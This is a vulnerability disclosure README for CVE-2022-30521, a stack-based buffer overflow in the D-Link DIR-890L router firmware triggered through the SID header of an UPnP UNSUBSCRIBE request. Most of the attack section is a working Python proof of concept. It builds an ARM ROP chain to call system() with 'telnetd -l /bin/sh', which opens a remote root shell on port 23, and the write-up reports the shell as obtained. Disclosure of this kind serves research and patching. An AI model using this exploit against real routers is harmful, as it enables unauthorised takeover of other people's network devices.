Headline

CVE-2022-30521: CVE/README.md at main · winmt/CVE

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the D-Link Wi-Fi router firmware DIR-890L DIR890LA1_FW107b09.bin and previous versions. The function created at 0x17958 of /htdocs/cgibin will call sprintf without checking the length of strings in parameters given by HTTP header and can be controlled by users easily. The attackers can exploit the vulnerability to carry out arbitrary code by means of sending a specially constructed payload to port 49152.

2 years ago

CVE

Open in Source

#vulnerability #web #linux #buffer_overflow #telnet #wifi

CVE-ID

CVE-2022-30521

Information

Vendor of the products: D-Link

Reported by: WangJincheng([email protected]) && FeiXincheng([email protected])

Affected products: D-Link DIR-890L <= v1.07B09

Vendor Homepage: https://www.dlink.com

Overview

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the D-Link Wi-Fi router firmware DIR-890L DIR890LA1_FW107b09.bin and previous versions.

The function created at 0x17958 of /htdocs/cgibin will call sprintf without checking the length of strings in parameters given by HTTP header and can be controlled by users easily.

The attackers can exploit the vulnerability to carry out arbitrary code by means of sending a specially constructed payload to port 49152.

Vulnerability Description

The vulnerability is detected at /htdocs/cgibin.

There is a Stack-based Buffer Overflow vulnerability in the function created at 0x17A60. When we use UNSUBSCRIBE request, it will call the sub_17958 function which created at 0x17958.

However, in the sub_17958 function, it will call sprintf without checking the length of v2, which causes the stack overflow. The v2 here is SID parameter given by HTTP header.

Poc

# python3 from pwn import * from socket import * from os import * from time import * context(os = 'linux’, arch = ‘arm’)

libc_base = 0xb6f7e000

s = socket(AF_INET, SOCK_STREAM)

cmd = b’telnetd -l /bin/sh;’ payload = b’a’*449 payload += p32(libc_base + 0x18298) # pop {r3, pc}; payload += p32(libc_base + 0x406f8) # mov r0, r1; pop {r3, pc}; payload += p32(libc_base + 0x390fc) # pc add r1, sp, #0x2c; blx r3; payload += b’a’*4 # padding payload += p32(libc_base + 0x5a270) # pc system payload += b’a’*(0x2c-8) # padding payload += cmd

msg = b"UNSUBSCRIBE /gena.cgi?service=0 HTTP/1.1\r\n" msg += b"Host: localhost:49152\r\n" msg += b"SID: " + payload + b"\r\n\r\n"

s.connect((gethostbyname(“192.168.0.1”), 49152)) s.send(msg)

sleep(1) system(“telnet 192.168.0.1 23”)

Get Shell

Scan ports before exploit the vulnerability.

Exploit the vulnerability and get shell successfully.

Scan ports again and we can dectect that the port 23 which represents Telnet service has been opened.